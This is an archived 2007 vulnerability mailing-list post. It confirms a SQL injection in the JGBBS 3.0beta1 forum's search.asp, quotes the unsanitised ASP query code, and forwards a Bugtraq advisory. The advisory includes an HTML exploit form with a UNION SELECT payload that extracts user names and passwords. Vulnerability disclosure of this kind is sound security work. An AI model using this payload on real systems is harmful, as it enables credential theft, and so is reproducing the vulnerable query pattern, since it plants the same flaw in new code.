[VIM] [TRUE] JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit

Noam Rathaus noamr at beyondsecurity.com
Wed Mar 14 16:30:48 UTC 2007 

Hi,

The vulnerability is there (vulnerable code):
    author = Request.QueryString("author")
    bid = Request.QueryString("bid")

    ' Check parameters
    If Not IsNumeric(bid) Then
        bid = 0
    End If
    If CInt(bid) < 0 Then
        bid = 0
    End If
    If title = "" And author = "" Then
        Call ParseError(langErrSearchNoInput)
        Call DoErrorMsg("./search.asp")
    End If

    ' Generate SQL
    sql = "SELECT * FROM posts"
    If title <> "" Then
        sql = sql & " WHERE post_title LIKE '%" & title & "%'"
    End If

    If author <> "" Then
        If InStr(sql, "WHERE") <> 0 Then
            sql = sql & " AND user_name='" & author & "'"
        Else
            sql = sql & " WHERE user_name='" & author & "'"
        End If
    End If


----------  Forwarded Message  ----------

Subject: JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit
Date: Tuesday 13 March 2007 19:21
From: UniquE at unique-key.org
To: bugtraq at securityfocus.com

JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit

Type :

SQL Injection

Release Date :

{2007-03-13}

Product / Vendor :

JGBBS Is a Tree-style Online Forum System

http://sourceforge.net/projects/jgbbs/

Bug :

http://localhost/script/search.asp?author=-SQL Inj.-&bid=0

SQL Injection Exploit :

<title>JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection
 Exploit</title> <body bgcolor="#000000">
<form name="searchFrm" method="get"
 action="http://localhost/script/search.asp"> <table width="500" border="0"
 align="center">
<font face="Verdana" size="2" color="#FF0000"><b>JGBBS 3.0beta1 Version
 Search.ASP "Author" SQL Injection Exploit</b></font> <br>
  <tr>
    <td align="right"><font face="Arial" size="1" color="#00FF00">SQL
 Injection Code</td> <td>&nbsp;</td>
    <td><input name="author" type="text" value="UniquE-Key'UNION SELECT
 0,1,user_password,3,4,5,user_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
 FROM users" class="inputbox" style="color: #000000" style="width:300px;
 "></td> </tr>
  <tr>
    <td align="right"><font face="Arial" size="1" color="#00FF00">Search
 Board</td> <td>&nbsp;</td>
    <td>
      <select name="bid">
        <option value="0">(ALL)</option>
      </select>&nbsp;
      <input type="submit" value="Apply">
    </td>
  </tr>
</table>
</form>
<center><font face="Verdana" size="2"
 color="#FF0000"><b>UniquE-Key{UniquE-Cracker}</b></font> <br>
<font face="Verdana" size="2"
 color="#FF0000"><b>UniquE at UniquE-Key.ORG</b></font> <br>
<font face="Verdana" size="2"
 color="#FF0000"><b>http://UniquE-Key.ORG</b></font></center>

Tested :

JGBBS 3.0beta1

Vulnerable :

JGBBS 3.0beta1

Author :

UniquE-Key{UniquE-Cracker}
UniquE(at)UniquE-Key.Org
http://www.UniquE-Key.Org

-------------------------------------------------------

-- 
  Noam Rathaus
  CTO
  1616 Anderson Rd.
  McLean, VA 22102
  Tel: 703.286.7725 extension 105
  Fax: 888.667.7740
  noamr at beyondsecurity.com
  http://www.beyondsecurity.com

More information about the VIM mailing list